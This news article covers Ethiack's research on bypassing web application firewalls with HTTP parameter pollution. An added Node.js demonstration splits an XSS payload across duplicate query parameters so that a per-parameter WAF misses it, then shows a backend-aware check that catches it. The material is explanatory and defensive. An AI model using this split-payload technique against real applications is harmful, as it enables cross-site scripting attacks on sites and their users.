- Ethiack recently tested 17 different WAF configurations from major vendors
- As payload complexity increased, the rate at which payloads bypassed the WAFs rose dramatically
- Even the most sophisticated WAFs could be defeated with relatively simple payloads
Web application firewalls (WAFs) are not as resilient as organizations have been led to assume, and can often be bypassed to inject malicious JavaScript, experts have warned.
Security researchers at Ethiack recently tested 17 different WAF configurations from major vendors to see how well they block malicious payloads.
The in-depth report centred on a real penetration test against an ASP.NET application protected by a very restrictive WAF. Despite the firewall's configuration, the researchers found that they could exploit cross-site scripting (XSS) vulnerabilities through a technique called HTTP parameter pollution.
Parameters analyzed in isolation
This technique abuses the way different web frameworks handle several parameters with the same name: many of them merge the values in ways that can be manipulated to inject malicious JavaScript.
Ethiack said that as payload complexity increased, the rate at which payloads bypassed the WAFs rose dramatically. Simple injections succeeded 17.6% of the time, while advanced parameter-pollution techniques succeeded more than 70% of the time.
Even machine-learning-based WAFs designed to detect novel threats were vulnerable to subtle parsing tricks and obfuscation, the report said. But Ethiack's most surprising finding was that even the most sophisticated WAFs could be defeated with relatively simple payloads.
The problem with WAFs seems to be that they analyze each parameter in isolation and rely heavily on pattern matching.
As a result, they are blind to the nuanced ways in which web applications parse and interpret input. For example, ASP.NET joins duplicate query-string parameters into a single comma-separated string, and JavaScript treats a comma-separated sequence of expressions as valid executable code (the comma operator).
By crafting payloads that spread the malicious code across several parameters, so that no single parameter value matches a signature on its own, the researchers were able to evade detection and execute JavaScript in the browser.
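The following is an added example, not code from Ethiack's report or from any real WAF, that models the bypass described above end to end: the ASP.NET behaviour of joining duplicate parameters with a comma (modelled here in Node rather than run on ASP.NET), a hypothetical reflected sink, a constructed per-parameter signature set, and a backend-aware check that inspects the joined value instead. The function names, the signature rules, the query strings and the `searchTerm` sink are all assumptions made for the demonstration.

```javascript
// Added example (not Ethiack's or any vendor's code). Models the HTTP parameter
// pollution bypass of a per-parameter WAF, assuming an ASP.NET-style backend.

// ASP.NET's Request.QueryString["name"] returns every value supplied for a
// duplicated name joined with "," (NameValueCollection behaviour). We model that
// here so the example runs offline in Node without an ASP.NET host.
function aspNetGet(query, name) {
  const values = new URLSearchParams(query).getAll(name);
  return values.length ? values.join(',') : null;
}

// Hypothetical vulnerable page: reflects the parameter, unencoded, into a
// JavaScript string inside an assignment expression. (A `var q = '...'` declaration
// would not work the same way: inside `var`, commas separate declarators.)
function renderPage(query) {
  return "var searchTerm;\nsearchTerm = '" + aspNetGet(query, 'q') + "';";
}

// Constructed signature set for a naive WAF. Each rule expects the WHOLE pattern
// to appear inside one parameter value, e.g. quote, separator, then a call.
const SIGNATURES = [
  /['"]\s*[;,]\s*[a-z_$][\w$]*\s*\(/i, // ',alert(  or  ';alert(
  /<script/i,
  /javascript:/i,
  /\bon\w+\s*=/i,
];

function matchesSignature(value) {
  return SIGNATURES.some((re) => re.test(value));
}

// Naive WAF: inspects each parameter value in isolation.
function perParameterWafBlocks(query) {
  for (const [, value] of new URLSearchParams(query)) {
    if (matchesSignature(value)) return true;
  }
  return false;
}

// Backend-aware WAF: merges duplicates the way the backend will, then inspects
// the merged value. The joiner is a per-framework setting (assumed "," here).
function joinedWafBlocks(query, joiner = ',') {
  const params = new URLSearchParams(query);
  for (const name of new Set(params.keys())) {
    if (matchesSignature(params.getAll(name).join(joiner))) return true;
  }
  return false;
}

// Runs the rendered script with a stub `alert` so we can observe whether injected
// code actually executes. Returns the recorded alert calls, plus the error name
// if the rendered script was not valid JavaScript.
function runRendered(query) {
  const calls = [];
  try {
    new Function('alert', renderPage(query))((...args) => calls.push(args));
  } catch (e) {
    return { calls, error: e.name };
  }
  return { calls, error: null };
}

// Constructed requests.
const BENIGN = 'q=hello';
const SINGLE = "q=',alert(1),'";      // classic single-parameter payload
const SPLIT = "q='&q=alert(1)&q='";   // same payload split over duplicate parameters

function demo() {
  for (const [label, query] of Object.entries({ BENIGN, SINGLE, SPLIT })) {
    console.log(label, {
      joinedValue: aspNetGet(query, 'q'),
      perParameterBlocked: perParameterWafBlocks(query),
      joinedBlocked: joinedWafBlocks(query),
      alertCalls: runRendered(query).calls.length,
    });
  }
}

demo();
```

The split request passes the per-parameter check because `'` and `alert(1)` each look harmless against these rules, yet the backend sees `',alert(1),'`, the rendered script becomes `searchTerm = '',alert(1),'';`, and the comma operator runs `alert(1)`. A tighter rule set that flagged a bare `alert(` would catch this particular split, but the attacker can split differently; the structural problem is that the WAF evaluates a different string from the one the application executes. The durable fixes are output encoding in the application and, at the WAF, normalising parameters the same way the backend does.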
“This finding highlighted a critical vulnerability in basic security strategies: organizations can invest in expensive WAF technologies while remaining vulnerable to attacks that exploit basic implementation flaws or configuration oversights,” the researchers concluded.
“This reminds us that WAFs must not be used as a solution to the root problems of insecure code.”